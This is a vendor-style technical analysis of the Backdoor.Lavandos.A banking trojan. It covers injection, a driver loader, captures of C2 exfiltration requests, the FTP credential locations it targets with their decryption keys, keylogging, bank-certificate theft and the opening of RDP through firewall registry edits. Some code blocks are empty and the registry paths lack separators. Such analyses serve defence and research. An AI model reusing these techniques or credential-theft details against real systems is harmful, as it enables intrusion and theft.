Home / malwarePDF  

Backdoor.Lavandos.A


First posted on 21 November 2011.
Source: BitDefender

Aliases :

There are no other names known for Backdoor.Lavandos.A.

Explanation :

The original file injects 3 dlls(setupapi.dll, dll.dll, lib.dll) and 1 driver(sfc.sys).
In spoolsv.exe process it injects lib.dll, dll.dll and the driver and in iexplore.exe it injects dll.dll .The files dropted are:

- depending on the browser on the infected computer: <%program file folder%> [IExplorer | Mozila Firefox | Opera] setupapi.dll

- <%system folder%>sfcfiles.dll (lib.dll).

The clean sfcfiles.dll is cripted and packed in HKEY_LOCAL_MACHINESOFTWARESETTINGSCryptoHash and also moved in sfcfiles.dat. The file sfcfiles.dat is deleted after a restart. The infected sfcfiles.dll has the same size and the same attributes(creation time, modification time) as the original file.

Implementation details :

The library names are crypted and it creats a new thread for decription every time it needs to load a library.
Example:
0 54 8 3F 34 37 7B 31 3D 76 27 <-> kernel32
The imported function names used are searched using a hash. It loads the corresponding library and calculates a hash for every function name. If the hash is equal with the hash for the searched function it retrieves the function address.
Example:
1F515831h <-> GlobalAlloc

Ida code:



It makes sure that the searched function code doesn't start with a INT3(0xCC) [anti-debbuging]. If it finds a INT3 as a first byte of the function the returned address is a wrong one and the program will crash soon.

Ida code:



The code is obfuscated:

Ida code: compute hash function
- normal code:


- obfuscated code:

.



Thease 3 technics are used in every component file.

The driver is loaded with ZwSetSystemInformation. This driver is keeped on the disk for a very short time in /drivers/sfc.sys.
It opens the browser with:
rundll32 url.dll_FileProtocolHandler http://www.google.com
Each component file has some precise tasks:

LIB.DLL

1 Download for update.

It decrypts the access server from registry and downloads a package that contains 3 buffers packed whith aplib. It seems that on the server it has more then one version for every file. At every request a random version of the file is chosen.
After unpacking the package, it crypts the buffers and saves them in 3 registry values:

- HKLMSOFTWARESETTINGSCoreSettings -> crypted dll.dll;
- HKLMSOFTWARESETTINGSErrorControl -> crypted shellcode;
- HKLMSOFTWARESETTINGSDriveSettings -> crypted driver sfc.sys

It accesses the server name from registry value HKLMSOFTWARESETTINGSHashSeed. This data is keeped crypted :
http://mv[remove]o/page.php
http://atl[remove]to/page.php
http://sub[remove]ge.php
http://ser[remove]ge.php
http://allw[remove]ge.php
http://go[remove]ge.php

wireshark capture:
GET /vito/page.php?id=249D9E66C4923FA7&uid=9&link=a0&cookie=a7 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: mv[remove]com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/0.7.65
Cache-Control: max-age=1
Content-Encoding: gzip

Examples of request:
- GET /vito/page.php?query=249D9E66C4923FA7&hl=9&n=mozilla&do=index&client=a7&article=a8&id=unknown HTTP/1.1
- GET /vito/page.php?client=unknown&id=249D9E66C4923FA7&n=a3&var=a7&article=9&key=mozilla HTTP/1.1
- GET /vito/page.php?uid=a8&link=us&query=opera&lr=en&key=077F1DE5C2B8411D&id=a3&client=0

2 Loads the driver.
It decrypts the data from the registry value DriveSettings and loads the driver with LoadDriver() function.

DLL.DLL

1 Download for update.

It downloads a packate that contains 3 buffers packed with aplib.
After unpacking the package, it saves the package in 2 registry values (after it crypts the corresponding buffers) and one file:
- HKLMSOFTWARESETTINGSHashSeed -> crypted server names
- HKLMSOFTWARESETTINSGPnPData -> crypted 15 different dll.dll
- <%system folder%>sfcfiles.dll -> lib.dll
All the 15 dlls from PnpData are injected in allmost all processes.

2 Hooks some functions:

LdrGetProcedureAddress
InternetOpenA
InternetopenW
WSAStartup

Ida Code:



3 Sends all private information:

All information is stored in registry key HKLMSoftwareMicrosoftWindows. The names of the values represent hashs for the stored data. It enumerates the values from the registry key every time that a value changes (RegNotifyChangeKeyValueEx), it reads the data from the values, crypts it and sends it.
The post message is:

POST /vito/page.php?page=a9&lr=rnd&client=index&query=a3&do=rand& key=249D9E66C4923FA7&n=0&cookie=index HTTP/1.1
Content-Type: multipart/form-data; boundary=5c6438acde3a
Host: mv[remove].com
Content-Length: length(data)
Cache-Control: no-cache

--5c6438acde3a
Content-Disposition: form-data; name="d"; filename="dd"
Content-Type: application/octet-stream

swapcase(base64(data from value))

4 Writes commands for the other 15 dlls:

It receives data (InternetReadFile), 0x7d000 bytes maxim, and if the buffer starts with "

0000" it stores the buffer in a registry value.
The name of the command registry value is a hash computed on 9 bytes ("0000", the marker of the dll and a "x00" byte).
The received buffer has the following structure: "[

0000][marker][command]";
Exemple: "[

0000][0012][0]" - the 12-th dll, command '0', ("[" "]" were added just for better understanding ).
The commands are similar for all the dlls:

"HC" -> Deletes the value HKLMSoftwareMicrosoftWindowsCurrentVersionAppData.
"CS" -> It takes a screenshot and the bmp format is encoded in jpeg format. This picture is crypted and saved in HKLMSoftwareMicrosoftWindowshash_string.
"BK" -> deletes the key HKLMSoftwareSettings
-> crypts the string "BYE!" and sets the value "SOFTWARESettingsProperties"
-> decrypts the data from the value CryptoHash
-> deletes the key HKLMSoftwareSettings
-> moves the file "/sfcfiles.dll" in "/sfcfiles.dll.bak" and writes in "/sfcfiles.dll" the decrypted data from the value CryptoHash(which is the original sfcfiles.dll file)
"SK" -> it switches the desktop to "DefMainWin32XAWW"
"SB" -> deletes the key HKLMSoftwareSettings
-> crypts the string "BYE!" and sets the value "SOFTWARESettingsProperties"
-> decrypts the data from the value CryptoHash
-> deletes the key HKLMSoftwareSettings
-> moves the file "/sfcfiles.dll" in "/sfcfiles.dll.bak" and writes in "/sfcfiles.dll" the decrypted data from the value CryptoHash(which is the original sfcfiles.dll file)
-> it switches the desktop to "DefMainWin32XAWW" and file work
"BE" -> it writes in " SoftwareMicrosoftWindowsAWKeyData" value a part of the command
"DU"and "LU" ->it decrypts a part of the command and writes it in a temp file which is executed afterwards.

SETUPAPI.DLL

Executes the shellcode.
It allocates some memory for decrypting the shellcode from ErrorControl registry value, the dll.dll from CoreSettings value, the server names from HashSeed value and the 15 dll.dll from PnPData and then runs the shellcode. The shellcode loads the dll and, in the same way as the original file (based on a hash), it finds out the address of the DllRegisterServer function and then calls it. The server names are used by dll.dll for download.
Will be presented below the 15 dlls from PnPData.

Dll.dll_1 from PnPData

It hooks some functions:
- LdrGetProcedureAddress
- gethostbyname
- WSAAsyncGetHostByName
- connect
- send

The new LdrGetProcedureAddress checks if the name of the function, whose address is to be returned, has the same hash as one as the hooked function .
If it does the returned address is the hooked function address.

The new gethostbyname and the new WSAAsyncGetHostByName store the host name in a buffer.

The new connect function stores the ip address and port from sockaddr structure in some buffers.

The new send function takes the information about the ip address, socket port, hostname, username, password from the FTP protocol.
The last 3 parts of the information (hostname, username, password) are crypted with base64. A hash is computed for this buffer and if it does not exists in AppData value it is stored. Also the buffer is crypted and kept in HKLMSoftwareMicrosoftWindowshash_string (hash_string :if the hash is 0x1234abcd the hash_string is"1234abcd").

Ida code:





Pseudocode example

storeInValue function: (pseudocode)

{

input:

buffer = ip port swapcase(base64(hostname))| swapcase(base64(username))| swapcase(base64(password))

size_buffer = strlen(buffer_2) + 8; buffer2 = swapcase(base64(hostname))| swapcase(base64(username))|swapcase(base64(password))

flag_store_hash = 1; to store or not to store hash in HKLMSoftware MicrosoftWindows CurrentVersion AppData

buffer = [marker][buffer][400h] # the marker is the dll id

hash_buffer = hashfunction(buffer)

hash_string = encode_hex(hash_buffer)

if flag_store_hash:

AppData_hashes = RegQueryValueEx( HKLM Software Microsoft Windows CurrentVersion AppData )

if hash_buffer in AppData_hashes:

return 0;

else:

RegSetValueEx( HKLMSoftwareMicrosoftWindowsCurrentVersionAppData, AppData_hashes + hash_buffer )

}

# first rol cript

index = 0

for x in buffer:

buffer[index] = rol(x, hash_string[index%len_hash_string])

index += 1

# second xor cript

index = 0

for x in buffer:

buffer[index] = x ^ hash_string[index%len_hash_string]

index += 1

RegSetValueEx( HKLMSoftwareMicrosoftWindowshash_string, buffer )

Dll.dll_2 from PnPData

Mainly it steals information( ip, port, username, passwords ) about the ftp servers. It searches for the corresponding registry keys and files to get the wanted information.
All the ftp strings, registry and file names are crypted.

1 FlashFXP :
- SoftwareFlashFXPAppData
- SoftwareFlashFXPDataFolder
- SoftwareFlashFXPInstall Path
- FlashFXPSites.dat
- the key for password decription :yA36zA48dEhfrvghGRg57h5UlDv3
2 SecureFX :
- SoftwareVanDykeSecureFXConfig Path
3 WS_FTP :
- SoftwareIpswitchWS_FTPDataDir
- WS_FTPSitesws_ftp.ini
4 CoreFTP :
- SoftwareFTPWareCoreFTPSites stors passwords
5 FileZilla :
- SoftwareFileZillaInstall_Dir
- FileZilla.xml
- the key for passwords decription : FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ
6 FTP Voyager :
- .DEFAULTSoftwareRhino SoftwareFTP VoyagerFTP
- .DEFAULTSoftwareRhino SoftwareFTP VoyagerDataDirectory
- FTPVoyager.ftp
7 WCX_FTP :
- wcx_ftp.ini
8 BPFTP
- SoftwareBulletProof SoftwareOptions
- SoftwareBulletProof SoftwareSitesDir
9 GlobalSCAPE
- SoftwareGlobalSCAPESettingsSecuritySiteManagerPath
10 CoffeeCup Software :
- SoftwareCoffeeCup SoftwareInternetProfiles
11 FTP Commander Pro :
- SOFTWAREMicrosoftWindowsCurrentVersionUninstallFTP Commander ProUninstallString
- ftplist.txt
12 SmartFTP :
- SoftwareSmartFTP\SettingsGeneralApplication Data Folder
13 LeapFTP :
- SOFTWAREMicrosoftWindowsCurrentVersionUninstallLeapFTP UninstallString
- Sites.ini
14 FarFTP :
- SoftwareFarPluginsFTPHostsHostName

A buffer is created: buffer = [marker(4)][information][400h].
A hash is computed for this buffer and is kept, if it does not already exists, in HKLMSoftwareMicrosoftWindowsCurrentVersionAppData.
After the information is crypted it is stored in HKLMSoftwareMicrosoftWindowshash_string.

Dll.dll_3 from PnPData

It hooks some functions:
- TranslateMessage
- ExtTextOutA
- TextOutW
- CreateFileW
- LdrGetProcedureAddress
- LdrLoadDll

The new TranslateMessage function has keyloger role. It intercepts the pressed keys and saves them in a buffer. If the class name of the foreground window has "java.sun.awt.bifit" (bifit ->banking and finances technologies on internet)the wparam parameter is chenged to printscreen key code (the screenshot is saved in the clipboard).

The new ExtTextOutA and TextOutW verifies if the text starts with "http" and if so, it stores it in a registry value.

The new CreateFileW
If the file starts with "iBKS" it creates a structure containing :
- "FILE"
- 0x3EF
- length of the file name
- file name in widechar
- file data
This file contains the user's private encryption key. The scope is to steal information about a specific public-key-based Internet banking system which is used by a large number of Russian and Ukrainian banks.
A similar buffer is created [marker(2)][info][400h]. The hash is saved in HKLMSoftwareMicrosoftWindowsCurrentVersionAppData and the crypted data in HKLMSoftwareMicrosoftWindowshash_string.

It starts 2 more threads:
- thread1
Creates a buffer :["DATA1007"][flag module file name][found "java.sun.awt.bifit" string flag], organized as [marker(2)][buffer][400h].
The hash is saved in HKLMSoftwareMicrosoftWindowsCurrentVersionAppData and the crypted data in HKLMSoftwareMicrosoftWindowshash_string.

- thread2
It gets the data from the clipboard and saves it as "C:| data |:C". The buffer [marker(2)][info][400h] is created.
The hash is saved in HKLMSoftwareMicrosoftWindowsCurrentVersionAppData and the crypted data in
HKLMSoftwareMicrosoftWindowshash_string.

The new LdrGetProcedureAddress checks if the name of the function whose address is to be returned has the same hash as one as the hooked function . If it does the returned address is the hooked function address.

Dll.dll_4 from PnPData

It downloads new version for the content of the key values: CoreSettings, DriveSettings, ErrorControl.
It hooks some functions:
- CreateFileA
- recv
- LdrGetProcedureAddress
- LdrLoadDll

The new CreateFileA :
If the size of the file is less than 0xFA00, it creates a structure contining :
- "FILE"
- 0x3FB
- length of the file name
- file name
- file data
A buffer [marker(3)][data][400h] is computed and the resulting hash is saved in AppData if it doesn't already exists.
The crypted buffer is saved in HKLMSoftwareMicrosoftWindowshash_string.
In the same manner it saves the file user.ini and all the *.cnf, *.ini files and the file interpro.ini from the current module folder.
The Inter-PRO use is the most effective in electronic payment systems like Bank-client ones, based on Web-technologies and focused on servicing of the remote clients through the Internet, or in any other systems where the authorized confirmation of client request for service is needed (in electronic trade systems, electronic insurance, paid information service, etc.).

The new recv function creates a new thread that reads and executes the command from the command registry value.
If the data received begins with "POST" it checks if the received data containes "5c6438acde3a". If it doesn't containes this strings (it,s not one of its own POST) and if it finds one of the strings "pass" or "pwd" it saves the buffer received:
- the hash for [marker(3)][buffer][400h] in HKLMSoftwareMicrosoftWindowsCurrentVersionAppData
- the crypted buffer in HKLMSoftwareMicrosoftWindowshash_string
Saving POST-request parameters(username, password) it can target the Inter-PRO banking system.

Dll.dll_5 from PnPData

It hooks some functions :
- CreateFileW
- InternetConnectA
- InternetConnectW
- InternetWriteFile
The new CreateFileW :
It checks if the name of the file contains some extensions through hashes. The extensions are:
69806C03 => .js
630dc380 => .css
0641b482 => .dat
906dae01 => .dll
1f10c0b8 => .exe
9adad019 => .flv
c033b3c5 => .gif
17c6e3a0 => .htc
b4e835f6 => .htm
1a72cae0 => .ico
5f3b5800 => .jpg
32f00900 => .png
1e5e505c => .swf
9d74560b => .ttf
64d0302e => .txt
3c344800 => .xml

If the file name doesn't contain any of thease extensions, it creates a structure:
- "FILE"
- 0x3F9
- length of the file name
- file name
- file data
A buffer [marker(5)][data][400h] is computed and the resulting hash is saved in HKLMSoftwareMicrosoftWindowsCurrentVersionAppData if it doesn't already exists.
The crypted buffer is saved in HKLMSoftwareMicrosoftWindowshash_string.

The new InternetConnectA and the new InternetConnectW :
It gets the active window and for every child window gets the text with SendMessage(hWindow,WM_GETTEXT,lenText,buffer).
If the buffer starts with "http" and it contains the string "bsi.dll" it stores the link. By retrieving data from an HTTP request to bsi.dll some can collect personal information, targeting the BS-Client banking system.

It creates a thread that parses every logical drive. If the drives are removable, fixed or remote it searches throught all the folders recursively and if the path of the files contains one of the following strings and the string "CRYPTO", it saves the file in the same manner as before if the file has a size smaller than 0x3E800.
0328f7db => sec
2e03f00c => .000
d8003732 => cert
7fa6dfc8 => keys
87AC0CB7 => crypto

It also creates an other thread that goes through SOFTWARECrypto ProSettingsUSERS key. It enumerates all the subkeys and stores all the values names and values data:
value name
value data
value name
value data
value name
value data...
This information is added to the string:
string = "FLAVURL: the link stored from the new InternetConnectA or InternetConnectW
information" and will be stored:

- A buffer [marker(5)][string][400h] is computed and the resulting hash is saved in HKLMSoftwareMicrosoftWindowsCurrentVersionAppData if it doesn't already exists.
- The crypted buffer is saved in HKLMSoftwareMicrosoftWindowshash_string.

CryptoPro CSP makes possible the use of reliable, certified cryptographic information-security tools as components of the wide range of tools and software.

The new InternetWriteFile :
If the number of bytes to write are between 5 and 0xc350 the string :
data = "FLAVURL: the link stored from the new InternetConnectA or InternetConnectW
the buffer to be written" will be stored:
- A buffer [marker(5)][data][400h] is computed and the resulting hash is saved in HKLMSoftwareMicrosoftWindowsCurrentVersionAppData if it doesn't already exists.
- The crypted buffer is saved in HKLMSoftwareMicrosoftWindowshash_string.

Dll.dll_6 from PnPData

It hookes the function CreateFileW and in the new function stores the file if the file name has the extension ".JSK", string identified by hash( 0F027E800).
The JKS file type is primarily associated with 'keytool' by Sun Microsystems, Inc.. Keytool is a key and certificate management utility. It allows users to administer their own public/private key pairs and associated certificates for use in self-authentication (where the user authenticates himself/herself to other users/services) or data integrity and authentication services, using digital signatures. It also allows users to cache the public keys (in the form of certificates) of their communicating peers. A keystore is a storage facility for cryptographic keys and certificates.

Dll.dll_7 from PnPData

It hooks the RCN_R50Init function from FilialRCon.dll(used by Raiffeisen bank) for intercepting the private data(username,password) before encryption.

Dll.dll_9 from PnPData

It hooks a function from sks2xyz.dll.
The new function from sks2xyz.dll stores the file sign.cer(self-signed certificate used by Faktura bank)

Dll.dll_10 from PnPData

It builds a address table, containing the addresses of needed functions. Every function call is relative to the begining of the table to make the analysis harder.
It creates multiple threads that are synchronized with mutexes.
It hooks :
- InternetReadFile
- HttpSendRequestA
- HttpSendRequestW
- InternetReadFileExA
- InternetReadFileExW
- InternetCloseHandle
- InternetQueryDataAvailable
- the callback function assigned to the handle used by asynchronous InternetConnection() function

The new functions have the role to steal and store personal information : username and passwords corresponding to the current internet connection.

Ida Code:





Thease pieces of information are concatenated in a single string like:

BA_urlString
user=usernameString&pass=passwordString.

This string is crypted and stored in a registry value if the URL string contains words as pay, payment, money, bank, /admin, faktura words that are identified using hashes:

- 0C200C900 => pay
- 0C32DE341 => payment
- 0CCA96A40 => money
- 0FDB6305E => /admin
- 79304AC0 => bank
- 3C3B45C5 => faktura

Dll.dll_11 from PnPData

Hooked functions:
- PFXImportCertStore
- CertFindCertificateInStore

The new PFXImportCertStore:
It stores the information:
data = CRGR base64(password) | base64(subject name)i | base64(issuer name)i | base64(cript(proprety of the certificate context)) |^ [marker(0xC)][data][400h]

It also creates a thread that gets and stores information about the most common system certificates.

Dll.dll_12 from PnPData

It has an advanced backdoor behaviour.
Depending on the module is running from identify by the hash: 0EDBCDA59h => WINLOGON.EXE:
If it's not running from winlogon.exe:

Values SoftwareMicrosoftManualConfigA32 and SoftwareMicrosoftManualConfigA64 keeps configuration information:
- ManualConfigA32 keeps the day of the month when ManualConfigA64 was set.
- data from ManualConfigA64 could be '0' or '1' or '2'
First it checks if in ManualConfigA32 is the current day of the month, and if it is it reads data from ManualConfigA64.
If it doesn't find current day in ManualConfigA32 will ask the server(storing something in a value key) for a value to be set in ManualConfigA64:

Ida code:



When asking the command it does the following:
It stores the string "1111" :
A buffer [marker(12h)][data][400h] is computed and the resulting hash is saved in HKLMSoftwareMicrosoftWindowsCurrentVersionAppData if it doesn't already exists.
The crypted buffer is saved in HKLMSoftwareMicrosoftWindowshash_string.

In a wireshark capture it can be observed :

POST /vito/page.php?page=a9&lr=rnd&client=index&query=a3&do=rand&key=249D9E66C4923FA7&n=0&cookie=index HTTP/1.1
Content-Type: multipart/form-data; boundary=5c6438acde3a
Host: mv[remove].com
Content-Length: 167
Cache-Control: no-cache

--5c6438acde3a
Content-Disposition: form-data; name="d"; filename="dd"
Content-Type: application/octet-stream

eGaaadeXmthsbWaaaaaaap8aaad/aaaa

If we apply a series of functions :

"eGaaadeXmthsbWaaaaaaap8aaad/aaaa".swapcase().decode('base64').encode('hex') =>1200000031313131d207000000000000ff000000ff000000



marker "1111" push 7D2h arg_0 arg_4 arg_8
12000000 [31313131] [d2070000] [00000000] [ff000000] [ff000000]
And server responses with the following buffer "

000000120" :

[00000012][0], 00000012 is the dll id, and '0' is current command from server
The other 2 commands could be '1' or '2'.

If it didn't receive today from server a command like '1' or '2', then will not start the next two threads.
The threads are sincronized by mutexs: "wbfxet" for the first thread "xzxgavonkq" for the second thread.
The threads execute the same function but depending on the parameter, will do different things.

The first thread is specialized for Remote Desktop Connections:

It changes "SYSTEMCurrentControlSetControlTerminal ServerfDenyTSConnections" value to 0 to enable the remote connections. It opens the Remote Desktop Service, TermService and checks its status. If the service is not running it will be started. Terminal Services, is one of the components of Microsoft Windows (both server and client versions) that allows a user to access applications and data on a remote computer over a network, using the Remote Desktop Protocol (RDP).

It sets the value

"SYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileGloballyOpenPortsList3389:TCP" with "3389:TCP:*:Enabled:@xpsp2res.dll" to change the Windows Firewall configuration to allow access to the default port for Remove Desktop Connections.

The second thread specialized for oppening a server on random port:

Adds the module to the authorized application by changing the Windows Firewall configuration:
It adds the value "SYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicy StandardProfileAuthorizedApplicationsListModuleName"
The data value is "PathModule :*:Enabled: ModuleName".
It searches for a valid port to open a server, it tries just 4 times to find a valid port higher then 1000.

Both threads:
It decompress a component dll(packed with aplib and contained in current dll), PortexClient.dll, and gets the address of MappingServer function and executes it.
The function is called with the following parameters:

Ida code:



The ip 188.165.214.122 resolves to "ns211520.ovh.net".

If it's running from winlogon.exe:

It opens a Desktop object with "Winlogon" name and assigns it to the calling thread so it can show some message boxes even if no user is logged on the computer.
It searches for that "string_hash_computer_name" using EnumWindows -> EnumChildWindows -> GetWindowTextA
It waits untill it finds it or untill it finds a secret key identified by a hash value: "9A79F222h". If that secret key is found, will show a message box with the following information: "key", "string_hash_computer_name".
If it exists it deletes the registry key "SYSTEMCurrentControlSetControlTerminal ServerDos" to reset RDP Timeout settings.
If deletion succeeds will show a message box containing: "Origami: RDP Timeout settings was modified - reconnect to apply it"
It has an option to open cmd.exe shell and it will show a message box containing "Origami: Load cmd.exe shell?" with uType:
MB_ICONQUESTION|MB_YESNO|MB_SERVICE_NOTIFICATION.
For the "Yes" option it will run that cmd.exe using WinExec.
After that a message box containing "Origami: press OK as finished to load explorer. Note - all your processes will be hided until you press OK" will be displayed. For the "OK" option a explorer.exe will be opened and a remote connection will be available in the infected sistem.
The cmd.exe can in any scope and it isn't visible for the user.

Dll.dll_13_14 from PnPData

It stores some files(string containing restriction) and all the ".key" files in that folder. Files with the extension ".KEY" :
contain registration information or a security code for a software program; often created when the program is registered; typically stored in the program's application folder or the system preferences folder.
Struct for Dll.dll_13 from PnPData:
- "FILE"
- 0x3ED
- length of the file name
- file name
- file data
A buffer [marker(13h)][data][400h] is computed and the resulting hash is saved in HKLMSoftwareMicrosoftWindowsCurrentVersionAppData if it doesn't already exists.
The crypted buffer is saved in HKLMSoftwareMicrosoftWindowshash_string.

Struct for Dll.dll_14 from PnPData:
- "FILE"
- 0x3E9
- length of the file name
- file name
- file data
A buffer [marker(14h)][data][400h] is computed and the resulting hash is saved in HKLMSoftwareMicrosoftWindowsCurrentVersionAppData if it doesn't already exists.
The crypted buffer is saved in HKLMSoftwareMicrosoftWindowshash_string.

It get the active window and for every child window gets the text with SendMessage(hWindow,WM_GETTEXT,lenText,buffer).
If the buffer starts with "http" and it contains the string "ibc" it stores the link.

Dll.dll_15 from PnPData

- keylogger function
- deletes the key : SoftwareMartin PrikrylWinSCP 2ConfigurationSecurity
- stores some information about the foreground windows.
- stores some file ; the file name must not contain some strings.

The driver:

It creates a system thread that monitors the change of the "RegistryMachineSoftwareSettings" and sets a flag if the function ZwNotifyChangeKey returns STATUS_NOTIFY_CLEANUP
This status indicates that the notify change request has been completed due to closing the handle that made the notify change request.
It decripts the data from the value "Properties". If it is "BYE!" it sets a flag.
Decrypts the data from the values : ErrorControl, CoreSettings, HashSeed and PnPData and builds a buffer with the following structure:

buffer with registries data = data ErrorControl
size CoreSettings
data CoreSettings
0xBA
0x0BAD1C0DEh
size data ErrorControl
size data HashSeed
data HashSeed
size PnPData
data PnPData
The key for decryption is taken from the DigitalProductId value for the values ErrorControl, CoreSettings, PnPData and from a buffer with descending values (from 0xFF to 0x00) for the value HashSeed.
It creates a double chained list containing for retaining information about the injected processes :
LIST:
- pointer to the next element
- pointer to the previous element
- the process ID
- a pointer to the buffer with the registries data
- a pointer to a memory descriptor list for the buffer
- the starting address of the mapped pages
- the size of the buffer mentionate above
- the inject phase (initial 0)
- the entry point of the current process

In the caller-supplied load-image callback routine :
VOID
(*PLOAD_IMAGE_NOTIFY_ROUTINE) (
IN PUNICODE_STRING FullImageName,
IN HANDLE ProcessId, // where image is mapped
IN PIMAGE_INFO ImageInfo
);
Checks if the flag corresponding to the data("BYE!") value "Properties" is set and, if so, it leaves the routine.
It searches for ".exe", "system32
tdll.dll", "wininet.dll", "ws2_32.dll", "iertutil.dll", "msvbvm60.dll" in the FullImageName .
If the FullImageName contains ".exe" it searches the current process pid in the list discribed above and if it does't exist it adds a new node.
If the FullImageName contains "system32
tdll.dll" :
- it identifies the function name ZwProtectVirtualMemory by hash (0D3DA486Dh) and gets the address using the KeServiceDescriptorTable:

Ida code:



- it allocates a memory descriptor list for the buffer described above and maps the physical page.
If the FullImageName contains "wininet.dll" or "ws2_32.dll" or "iertutil.dll" or "msvbvm60.dll" :
If the node corresponding to the current process exists:

- The inject phase becomes 1.

- It creats a system thread(that executes in kernel mode - PsCreateSystemThread) that attaches itself to the running process. It patches the data from the ErrorControl value that represents the shellcode:
pusha
mov eax, the first dword at EntryPoint for the current process
mov ebx, the second dword at EntryPoint+4 for the current process
mov edi, adrOfEntryPoint for the current process

- At the EntryPoint of the current process puts:
push adressOfTheMappedPages
ret
where addressOfTheMappedPages points to the beginning of shellcode

- After the patch the inject phase becomes 2.

In a caller-suplied process-creation callback routine :

VOID
(*PCREATE_PROCESS_NOTIFY_ROUTINE) (
IN HANDLE ParentId,
IN HANDLE ProcessId,
IN BOOLEAN Create
);

If the last thread within the process has terminated for the corresponding node in the list :
- it unmaps the pages
- it frees the coresponding memory descriptor list
- it releases the mutex which corresponded to the pid
- it frees the structure

If the driver doesn't runs as a service:
- It doesn't create the first thread.
- Takes the data from the registry value DriveSettings and writes it in "??data from SystemRoot valuesystem32driverssfc.sys".
- It creates "RegistryMachineSYSTEMCurrentControlSetServicessfc".
- It set a dword value, "Type"- data value : 1.
- It loads the driver "RegistryMachineSYSTEMCurrentControlSetServicessfc" into the system.
- It deletes "??data from SystemRoot valuesystem32driverssfc.sys".

Last update 21 November 2011

 

TOP